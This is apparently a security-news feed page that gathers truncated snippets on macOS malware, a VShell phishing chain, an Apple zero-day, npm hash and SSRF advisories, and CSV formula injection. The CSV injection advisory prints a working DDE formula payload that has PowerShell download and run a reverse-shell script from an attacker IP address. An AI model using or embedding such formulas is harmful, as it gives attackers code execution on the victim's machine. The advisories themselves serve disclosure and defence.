#mac

CrowdStrike reports COOKIE SPIDER using malvertising to spread SHAMOS macOS malware (a new variant of AMOS infostealer), stealing…

### Summary Description: `CSV Injection` or `Formula Injection` is a security vulnerability that occurs when malicious content is inserted into a CSV (Comma-Separated Values) file, which is then opened in a spreadsheet application like Microsoft Excel. This attack exploits the way spreadsheet software automatically interprets certain text patterns as formulas or commands, rather than plain text. ### Details A basic test for CSV Injection is using `SUM()` to add two numbers or open calc.exe​ using​ command: `=cmd|' /C calc'!A0​` The same method can be used to run arbitrary code on the victim's machine. For example the below code will download and execute a malicious script to create a reverse TCP connection to the attacker's machine. *Payload*: > This is our payload and will be used in the vulnerable field during exploitation ``` =cmd|' /C powershell Invoke-WebRequest "http://52.172.182.242:7000/shell.ps1" -OutFile "$env:Temp\shell.ps1"; powershell -ExecutionPolicy Bypas...

Cybersecurity researchers have shed light on a novel attack chain that employs phishing emails to deliver an open-source backdoor called VShell. The "Linux-specific malware infection chain that starts with a spam email with a malicious RAR archive file," Trellix researcher Sagar Bade said in a technical write-up. "The payload isn't hidden inside the file content or a macro, it's encoded directly

The growing ecosystem of agents, chatbots, and machine credentials that outnumber human users by an order of magnitude is creating a poorly understood but potentially major security issue.

### Summary This affects e.g. `create-hash` (and `crypto-browserify`), so I'll describe the issue against that package Also affects `create-hmac` and other packages Node.js `createHash` works only on strings or instances of Buffer, TypedArray, or DataView. Missing input type checks in npm `create-hash` polyfill of Node.js `createHash` lead to it calculating invalid values, hanging, rewinding the hash state (including turning a tagged hash into an untagged hash) on malicious JSON-stringifyable input ### Details See PoC ### PoC ```js const createHash = require('create-hash/browser.js') const { randomBytes } = require('crypto') const sha256 = (...messages) => { const hash = createHash('sha256') messages.forEach((m) => hash.update(m)) return hash.digest('hex') } const validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever const payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe') const receivedMessage = JSON.parse(payload) // e....

Apple has released security updates to patch a zero-day vulnerability tracked as CVE-2025-43300 for all platforms

Apple has released security updates to address a security flaw impacting iOS, iPadOS, and macOS that it said has come under active exploitation in the wild. The zero-day out-of-bounds write vulnerability, tracked as CVE-2025-43300, resides in the ImageIO framework that could result in memory corruption when processing a malicious image. "Apple is aware of a report that this issue may have been

Exposure of APIs, sensitive data, and corporate documents are just some of the security issues that the purveyor of Big Macs was cooking up.

Disclosure: This article was provided by ANY.RUN. The information and analysis presented are based on their research and findings.

Server-Side Request Forgery (SSRF) in eventmesh-runtime module in WebhookUtil.java on windows\linux\mac os e.g. allows the attacker can abuse functionality on the server to read or update internal resources. Users are recommended to upgrade to version 1.12.0 or use the master branch, which fixes this issue.